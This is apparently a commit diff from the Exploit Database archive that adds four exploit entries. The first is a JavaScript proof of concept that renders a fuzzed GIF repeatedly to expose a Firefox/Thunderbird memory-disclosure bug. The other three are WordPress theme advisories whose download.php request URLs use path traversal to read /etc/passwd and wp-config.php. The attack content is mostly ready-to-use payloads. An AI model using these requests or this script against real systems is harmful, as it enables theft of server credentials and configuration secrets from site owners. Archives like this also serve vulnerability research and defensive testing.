DB: 2016-01-24

Offensive Security · Offensive Security · commit 73e749c84551 · 2016-01-24T05:02:48.000Z
4 new exploits
diff --git a/files.csv b/files.csv
@@ -35535,3 +35535,7 @@ id,file,description,date,author,platform,type,port
 39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0
 39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0
 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Vulnerability",2014-08-26,"Claudio Viviani",php,webapps,0
+39295,platforms/multiple/remote/39295.js,"Mozilla Firefox <= 9.0.1 and Thunderbird <= 3.1.20 Information Disclosure Vulnerability",2014-09-02,"Michal Zalewski",multiple,remote,0
+39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
+39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
+39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
diff --git a/platforms/multiple/remote/39295.js b/platforms/multiple/remote/39295.js
@@ -0,0 +1,140 @@
+source: http://www.securityfocus.com/bid/69525/info
+
+Mozilla Firefox and Thunderbird are prone to an information-disclosure vulnerability.
+
+Attackers can exploit this issue to disclose sensitive information that may aid in further attacks.
+
+This issue is fixed in:
+
+Firefox 32
+Firefox ESR 31.1
+Thunderbird 31.1 
+
+<style>
+body {
+  background-color: #d0d0d0;
+}
+
+img {
+  border: 1px solid teal;
+  margin: 1ex;
+}
+
+canvas {
+  border: 1px solid crimson;
+  margin: 1ex;
+}
+</style>
+
+<body onload="set_images()">
+
+<div id="status">
+</div>
+
+<div id="image_div">
+</div>
+
+<canvas height=32 width=32 id=cvs>
+</canvas>
+
+<h2>Variants:</h2>
+
+<ul id="output">
+</ul>
+
+<script>
+var c = document.getElementById('cvs');
+var ctx = c.getContext('2d');
+
+var loaded = 0;
+var image_obj = [];
+var USE_IMAGES = 300;
+
+function check_results() {
+
+  var uniques = [];
+
+  uniques.push(image_obj[0].imgdata);
+
+  document.getElementById('output').innerHTML += 
+    '<img src="' + image_obj[0].imgdata + '">';
+
+  for (var i = 1; i < USE_IMAGES; i++) {
+
+    if (image_obj[0].imgdata != image_obj[i].imgdata) {
+
+      for (var j = 1; j < uniques.length; j++)
+        if (uniques[j] == image_obj[i].imgdata) break;
+
+      if (j == uniques.length) {
+
+        uniques.push(image_obj[i].imgdata);
+
+        document.getElementById('output').innerHTML += 
+          '<img src="' + image_obj[i].imgdata + '">';
+
+
+      }
+
+
+    }
+
+  }
+
+  if (uniques.length > 1)
+    alert('The image has ' + uniques.length + ' variants when rendered. Looks like you have a problem.');
+  else
+    alert('The image has just one variant when rendered. You\'re probably OK.');
+
+}
+
+
+function count_image() {
+
+  loaded++;
+
+  ctx.clearRect(0, 0, 32, 32);
+
+  try {
+    ctx.drawImage(this, 0, 0, 32, 32);
+  } catch (e) { }
+
+  this.imgdata = c.toDataURL();
+
+  if (loaded == USE_IMAGES) check_results();
+
+}
+
+
+function set_images() {
+
+  loaded = 0;
+  create_images();
+
+  for (var i = 0; i < USE_IMAGES; i++)
+    image_obj[i].src = './id:000110,src:000023.gif?' + Math.random();
+
+}
+
+
+function create_images() {
+
+  for (var i = 0; i < USE_IMAGES; i++) {
+
+    image_obj[i] = new Image();
+    image_obj[i].height = 32;
+    image_obj[i].width = 32;
+    image_obj[i].onerror = count_image;
+    image_obj[i].onload = count_image;
+
+    document.getElementById('image_div').appendChild(image_obj[i]);
+
+  }
+
+}
+
+
+</script>
+
+
+<iframe src='http://www.example.com/'></iframe>
diff --git a/platforms/php/webapps/39296.txt b/platforms/php/webapps/39296.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69670/info
+
+Urban City theme for Wordpress is prone to an arbitrary file-download vulnerability.
+
+An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
+
+http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd 
diff --git a/platforms/php/webapps/39297.txt b/platforms/php/webapps/39297.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69671/info
+
+Authentic theme for Wordpress is prone to an arbitrary file-download vulnerability.
+
+An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
+
+http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php 
diff --git a/platforms/php/webapps/39298.txt b/platforms/php/webapps/39298.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69672/info
+
+Epic theme for Wordpress is prone to an arbitrary file-download vulnerability.
+
+An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 
+
+http://www.example.com/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php 
